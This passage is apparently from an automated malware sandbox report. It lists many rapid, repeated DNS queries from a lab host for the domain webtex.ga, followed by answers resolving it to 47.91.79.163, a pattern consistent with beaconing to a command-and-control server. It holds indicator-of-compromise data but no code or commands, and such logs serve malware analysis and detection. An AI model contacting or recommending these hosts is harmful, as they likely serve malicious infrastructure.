                                    Dec 3, 2020 10:03:39.622893095 CET192.168.2.38.8.8.80x2773Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:39.961132050 CET192.168.2.38.8.8.80x1327Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:40.350091934 CET192.168.2.38.8.8.80xb392Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:40.643349886 CET192.168.2.38.8.8.80xd79cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:40.917800903 CET192.168.2.38.8.8.80x2d9bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:41.210357904 CET192.168.2.38.8.8.80x2b7dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:41.501154900 CET192.168.2.38.8.8.80x9e39Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:41.788903952 CET192.168.2.38.8.8.80xbac6Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:42.078183889 CET192.168.2.38.8.8.80x91f1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:42.745702982 CET192.168.2.38.8.8.80xabc8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:43.046442032 CET192.168.2.38.8.8.80x1b62Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:43.359462976 CET192.168.2.38.8.8.80xef30Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:43.637032032 CET192.168.2.38.8.8.80xf5dbStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:43.957545042 CET192.168.2.38.8.8.80x66a8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:44.347207069 CET192.168.2.38.8.8.80x3076Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:44.619749069 CET192.168.2.38.8.8.80xa64fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:44.920094967 CET192.168.2.38.8.8.80x18d1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:45.199316978 CET192.168.2.38.8.8.80x16fcStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:45.705465078 CET192.168.2.38.8.8.80xf333Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:46.270900965 CET192.168.2.38.8.8.80x8a44Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:46.745162964 CET192.168.2.38.8.8.80x24bdStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:47.266988039 CET192.168.2.38.8.8.80x44edStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:47.829632998 CET192.168.2.38.8.8.80xa991Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:48.394521952 CET192.168.2.38.8.8.80x7ed0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:48.946424961 CET192.168.2.38.8.8.80xed25Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:49.333678007 CET192.168.2.38.8.8.80x1f9bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:49.653568029 CET192.168.2.38.8.8.80xdd43Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:50.292429924 CET192.168.2.38.8.8.80x4dcbStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:50.652407885 CET192.168.2.38.8.8.80x3c4cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:51.184968948 CET192.168.2.38.8.8.80xc3f4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:51.697694063 CET192.168.2.38.8.8.80x9b59Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:51.962105036 CET192.168.2.38.8.8.80x1acaStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:52.491959095 CET192.168.2.38.8.8.80xcf36Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:53.082986116 CET192.168.2.38.8.8.80xa9feStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:53.692517996 CET192.168.2.38.8.8.80xbf15Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:53.964230061 CET192.168.2.38.8.8.80x86cdStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:54.522007942 CET192.168.2.38.8.8.80xb35eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:55.105586052 CET192.168.2.38.8.8.80xf4fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:55.802597046 CET192.168.2.38.8.8.80xa750Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:56.065541029 CET192.168.2.38.8.8.80x2127Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:56.584539890 CET192.168.2.38.8.8.80xaf39Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:57.100286007 CET192.168.2.38.8.8.80x9ef3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:57.629905939 CET192.168.2.38.8.8.80x6144Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:58.233308077 CET192.168.2.38.8.8.80x7360Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:58.499917984 CET192.168.2.38.8.8.80xc4a6Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:58.767443895 CET192.168.2.38.8.8.80x3dd1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:59.049704075 CET192.168.2.38.8.8.80x5daStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:59.326589108 CET192.168.2.38.8.8.80x9a3eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:59.609312057 CET192.168.2.38.8.8.80x8d7fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:59.880233049 CET192.168.2.38.8.8.80x3864Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:00.164766073 CET192.168.2.38.8.8.80x3309Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:00.456994057 CET192.168.2.38.8.8.80xf0dbStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:00.739052057 CET192.168.2.38.8.8.80x4800Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:01.117043972 CET192.168.2.38.8.8.80x9a8fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:01.421802998 CET192.168.2.38.8.8.80x674bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:01.710134983 CET192.168.2.38.8.8.80x6b11Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:02.015068054 CET192.168.2.38.8.8.80xb6d9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:02.381865025 CET192.168.2.38.8.8.80xf523Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:02.661564112 CET192.168.2.38.8.8.80xc521Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:02.942312956 CET192.168.2.38.8.8.80xd047Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:03.232505083 CET192.168.2.38.8.8.80x7eb0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:03.505784988 CET192.168.2.38.8.8.80xf399Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:03.795294046 CET192.168.2.38.8.8.80x1a21Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:04.074474096 CET192.168.2.38.8.8.80xf5b1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:04.355796099 CET192.168.2.38.8.8.80xf389Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:04.647460938 CET192.168.2.38.8.8.80xd7e2Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:04.915332079 CET192.168.2.38.8.8.80x9e4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:05.199299097 CET192.168.2.38.8.8.80xbd95Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:05.483560085 CET192.168.2.38.8.8.80x5da6Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:05.769323111 CET192.168.2.38.8.8.80xcb30Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:06.074758053 CET192.168.2.38.8.8.80x8b25Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:06.352900982 CET192.168.2.38.8.8.80x181aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:06.635427952 CET192.168.2.38.8.8.80x37caStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:06.949789047 CET192.168.2.38.8.8.80x8014Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:07.224431038 CET192.168.2.38.8.8.80x38f9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:07.525737047 CET192.168.2.38.8.8.80xd334Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:07.808995962 CET192.168.2.38.8.8.80x7f82Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:08.217499971 CET192.168.2.38.8.8.80x877Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:08.498416901 CET192.168.2.38.8.8.80xa0f9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:08.778889894 CET192.168.2.38.8.8.80x15b0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:09.057873011 CET192.168.2.38.8.8.80x5fccStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:09.325339079 CET192.168.2.38.8.8.80x99c0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:09.614290953 CET192.168.2.38.8.8.80x7e55Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:09.901053905 CET192.168.2.38.8.8.80x99f5Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:10.190378904 CET192.168.2.38.8.8.80xa059Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:10.459393978 CET192.168.2.38.8.8.80x80e6Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:10.736605883 CET192.168.2.38.8.8.80x29c1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:11.023058891 CET192.168.2.38.8.8.80xac48Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:11.390893936 CET192.168.2.38.8.8.80x9904Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:11.669486046 CET192.168.2.38.8.8.80x3918Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:11.944083929 CET192.168.2.38.8.8.80xb0f3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:12.247473955 CET192.168.2.38.8.8.80x18e8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:12.585220098 CET192.168.2.38.8.8.80x5ef8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:12.864528894 CET192.168.2.38.8.8.80x7295Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:13.144134045 CET192.168.2.38.8.8.80x938aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:13.455523968 CET192.168.2.38.8.8.80x33f4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:13.773528099 CET192.168.2.38.8.8.80x2cb5Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:14.070842981 CET192.168.2.38.8.8.80xcfa8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:14.356909990 CET192.168.2.38.8.8.80x6ed3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:14.643935919 CET192.168.2.38.8.8.80x311aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:14.910386086 CET192.168.2.38.8.8.80x4c98Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:15.187752008 CET192.168.2.38.8.8.80x82a5Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:15.465322018 CET192.168.2.38.8.8.80x1bb4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:15.742861986 CET192.168.2.38.8.8.80xc751Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:16.022732019 CET192.168.2.38.8.8.80x693fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:16.517864943 CET192.168.2.38.8.8.80xaae8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:16.820955038 CET192.168.2.38.8.8.80x6eaStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:17.112066031 CET192.168.2.38.8.8.80xdaf3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:17.833745956 CET192.168.2.38.8.8.80x6912Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:18.132854939 CET192.168.2.38.8.8.80xbb4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:19.915863037 CET192.168.2.38.8.8.80x48f0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:20.226304054 CET192.168.2.38.8.8.80x58ebStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:20.501063108 CET192.168.2.38.8.8.80x58e2Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:20.803499937 CET192.168.2.38.8.8.80xfb15Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:21.247961044 CET192.168.2.38.8.8.80xfcddStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:21.527256012 CET192.168.2.38.8.8.80xe84cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:21.853420019 CET192.168.2.38.8.8.80xaff7Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:22.121886015 CET192.168.2.38.8.8.80xbb16Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:22.394130945 CET192.168.2.38.8.8.80x7419Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:22.719099998 CET192.168.2.38.8.8.80x1e85Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:22.981034994 CET192.168.2.38.8.8.80x1d6fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:23.254004002 CET192.168.2.38.8.8.80x4e1cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:23.541433096 CET192.168.2.38.8.8.80xbd95Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:23.816549063 CET192.168.2.38.8.8.80x617aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:24.106113911 CET192.168.2.38.8.8.80xc7ceStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:24.394944906 CET192.168.2.38.8.8.80x35d2Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:24.686381102 CET192.168.2.38.8.8.80x98b3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:25.305768967 CET192.168.2.38.8.8.80xbedcStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:25.729907990 CET192.168.2.38.8.8.80x908bStandard query (0)webtex.gaA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Dec 3, 2020 10:02:28.898961067 CET8.8.8.8192.168.2.30x9dc0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:29.270814896 CET8.8.8.8192.168.2.30xcbccNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:29.589957952 CET8.8.8.8192.168.2.30xc90eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:30.129522085 CET8.8.8.8192.168.2.30xf2d3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:30.754401922 CET8.8.8.8192.168.2.30x8338No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:31.097273111 CET8.8.8.8192.168.2.30x6d5No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:31.500906944 CET8.8.8.8192.168.2.30x9e60No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:31.806010008 CET8.8.8.8192.168.2.30xd5d3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:32.129793882 CET8.8.8.8192.168.2.30x74e9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:32.452068090 CET8.8.8.8192.168.2.30x6a4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:32.744071007 CET8.8.8.8192.168.2.30xd74No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:33.043495893 CET8.8.8.8192.168.2.30x5d50No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:33.364901066 CET8.8.8.8192.168.2.30x1da8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:33.682089090 CET8.8.8.8192.168.2.30x8589No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:34.035439014 CET8.8.8.8192.168.2.30x7eabNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:34.341048002 CET8.8.8.8192.168.2.30xf473No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:34.806020975 CET8.8.8.8192.168.2.30x35eeNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:35.222217083 CET8.8.8.8192.168.2.30xce9dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:36.007853985 CET8.8.8.8192.168.2.30x6755No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:36.291889906 CET8.8.8.8192.168.2.30x9615No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:36.752609968 CET8.8.8.8192.168.2.30xa2f9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:38.533613920 CET8.8.8.8192.168.2.30x88f3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:38.853271961 CET8.8.8.8192.168.2.30x42fbNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:39.181564093 CET8.8.8.8192.168.2.30xb789No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:39.515683889 CET8.8.8.8192.168.2.30x5b0fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:39.829411030 CET8.8.8.8192.168.2.30xc726No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:40.145191908 CET8.8.8.8192.168.2.30xd319No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:40.442272902 CET8.8.8.8192.168.2.30xc211No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:40.741365910 CET8.8.8.8192.168.2.30xdd07No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:41.062978029 CET8.8.8.8192.168.2.30x8454No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:41.397211075 CET8.8.8.8192.168.2.30x1398No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:41.705841064 CET8.8.8.8192.168.2.30x70e5No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:42.011847019 CET8.8.8.8192.168.2.30x7f1fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:42.305793047 CET8.8.8.8192.168.2.30x3748No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:42.631668091 CET8.8.8.8192.168.2.30x1726No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:42.955840111 CET8.8.8.8192.168.2.30x602dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:43.260128975 CET8.8.8.8192.168.2.30x24ebNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:43.588223934 CET8.8.8.8192.168.2.30x238dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:43.908668041 CET8.8.8.8192.168.2.30x9a51No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:44.228200912 CET8.8.8.8192.168.2.30xe7c4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:44.629713058 CET8.8.8.8192.168.2.30x65e4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:44.999114037 CET8.8.8.8192.168.2.30x70f3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:45.340262890 CET8.8.8.8192.168.2.30xbe0dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:45.668576002 CET8.8.8.8192.168.2.30x4443No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:45.985465050 CET8.8.8.8192.168.2.30x44adNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:46.299807072 CET8.8.8.8192.168.2.30x21bdNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:46.599189997 CET8.8.8.8192.168.2.30x55ddNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:46.919864893 CET8.8.8.8192.168.2.30x5c7cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:47.186382055 CET8.8.8.8192.168.2.30x2b96No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:47.486779928 CET8.8.8.8192.168.2.30xf13cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:47.792609930 CET8.8.8.8192.168.2.30xca9dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:48.110110044 CET8.8.8.8192.168.2.30xa946No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:48.409198999 CET8.8.8.8192.168.2.30xbab1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:48.692008972 CET8.8.8.8192.168.2.30xe678No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:48.980655909 CET8.8.8.8192.168.2.30xe05fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:49.267726898 CET8.8.8.8192.168.2.30x7be3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:49.564949036 CET8.8.8.8192.168.2.30x5ed8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:50.039614916 CET8.8.8.8192.168.2.30xa25No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:50.339246988 CET8.8.8.8192.168.2.30x3f42No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:50.644004107 CET8.8.8.8192.168.2.30x58ceNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:50.950619936 CET8.8.8.8192.168.2.30x2a57No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:51.238410950 CET8.8.8.8192.168.2.30x9ccaNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:51.510412931 CET8.8.8.8192.168.2.30x2077No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:51.827558994 CET8.8.8.8192.168.2.30x99f5No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:52.104988098 CET8.8.8.8192.168.2.30x8296No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:52.420568943 CET8.8.8.8192.168.2.30x8f91No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:52.753354073 CET8.8.8.8192.168.2.30x3392No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:53.084618092 CET8.8.8.8192.168.2.30xa6edNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:53.439642906 CET8.8.8.8192.168.2.30x4d4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:53.727933884 CET8.8.8.8192.168.2.30xb873No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:54.092657089 CET8.8.8.8192.168.2.30xa277No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:54.383914948 CET8.8.8.8192.168.2.30xd645No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:54.660371065 CET8.8.8.8192.168.2.30x1694No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:55.292409897 CET8.8.8.8192.168.2.30x7c88No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:55.669667006 CET8.8.8.8192.168.2.30xa1c1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:57.143070936 CET8.8.8.8192.168.2.30x8e9cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:57.488672018 CET8.8.8.8192.168.2.30xfea6No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
